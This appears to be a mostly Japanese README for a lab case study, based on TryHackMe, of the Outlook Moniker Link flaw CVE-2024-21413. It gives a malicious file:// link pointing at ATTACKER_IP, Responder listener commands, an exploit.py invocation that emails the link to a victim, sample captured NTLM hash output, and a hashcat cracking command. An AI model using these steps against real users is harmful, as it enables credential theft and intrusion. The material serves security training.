CVE-2024-21413のケーススタディです。TryHackMeのMoniker Link (CVE-2024-21413) のルームをパラメータとして使用しています。exploitにはclaude codeで編集を加えました。
⚠️ 法的免責事項: このリポジトリは、教育およびセキュリティ研究のみを目的としています。すべてのデモは、管理された隔離環境で実施されました。明示的な許可なくシステムに対してこれらの技術を使用することは、違法かつ非倫理的です。
| 項目 | 詳細 |
|---|---|
| CVE | CVE-2024-21413 |
| 公表日 | 2024年2月13日 (Patch Tuesday) |
| CVSS スコア | 9.8 (緊急) |
| 製品 | Microsoft Outlook |
| 種別 | RCE + 資格情報漏えい (NTLM ハッシュ) |
| 攻撃ベクトル | ネットワーク / 電子メール (事前認証なし) |
| ユーザー操作 | ユーザーの操作が必要 (リンクをクリック) |
| 別名 | Moniker Link |
CVE-2024-21413 は Microsoft Outlook における重大な脆弱性であり、攻撃者に以下を可能にします:
「Moniker Link」という名前は、文字列でオブジェクトを参照する Windows のメカニズムである Component Object Model (COM) Moniker を悪用して、Outlook の file:// リンクに対する保護を回避することに由来します。
通常、Outlook はネットワークリソースを指す file:// リンクをブロックし、セキュリティ警告 (Protected View) を表示します。この欠陥は、Outlook が Moniker の区切り文字である ! 文字を含む URL を処理する方法にあります。
悪意のあるリンクは次の形式です:
file:///\\ATTACKER_IP\share\!something
! 文字により、Outlook のパーサーは URL を COM Moniker への参照として解釈し、通常のセキュリティチェックをバイパスします。結果は以下のとおりです:
Atacante envia e-mail → Vítima clica no link → Outlook processa URL com "!"
→ Bypass da Protected View → Conexão SMB automática → Hash NTLM capturado
このケーススタディを安全に再現するには:
| マシン | OS | 役割 |
|---|---|---|
| 攻撃者 | Kali Linux | SMB リスナー + エクスプロイト |
| 標的 | 脆弱な Outlook を搭載した Windows 10/11 | 被害者 |
重要: 隔離されたネットワーク (VirtualBox/VMware の NAT または Host-Only) を使用してください。実際のネットワークでは実行しないでください。
# Responder — listener SMB/HTTP para captura de hashes
sudo apt install responder
# Python 3 — para rodar o exploit
python3 --version
# Verificar conectividade entre as máquinas
ping <IP_ALVO>
ip a | grep inet
# Anote o IP da interface que se comunica com o alvo (ex: 192.168.56.10)
Responder は、NTLM 認証ハッシュをキャプチャする偽の SMB サーバーを作成します。
sudo responder -I eth0 -v
# Substitua eth0 pela sua interface de rede
期待される出力:
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 192.168.56.20
[SMB] NTLMv2-SSP Username : DESKTOP-ALVO\usuario
[SMB] NTLMv2-SSP Hash : usuario::DESKTOP-ALVO:...
python3 exploit.py \
--sender [email protected] \
--recipient [email protected] \
--server <IP_SERVIDOR_EMAIL> \
--attacker-ip 192.168.56.10
被害者が電子メールを開いてリンクをクリックすると、Responder は自動的に NTLM ハッシュをキャプチャします。このハッシュは次のように使用できます:
hashcat -m 5600 hash.txt wordlist.txt
完全なコメント付きスクリプトについては、exploit.py ファイルを参照してください。
攻撃の完全なフローのインタラクティブな可視化については、diagrama-ataque.html ファイルを参照してください。
緩和策と防御の完全なガイドについては、MITIGACAO.md ファイルを参照してください。
脆弱性の詳細な技術分析については、CVE-BREAKDOWN.md ファイルを参照してください。
このケーススタディは、TryHackMe による実践的な攻撃的セキュリティトレーニングの一環として開発されました。
このプロジェクトは、責任ある開示 (responsible disclosure) と倫理的ハッキング (ethical hacking) の原則に従っています。ここに記載されているすべてのコンテンツは、教育とセキュリティ体制の向上を目的としています。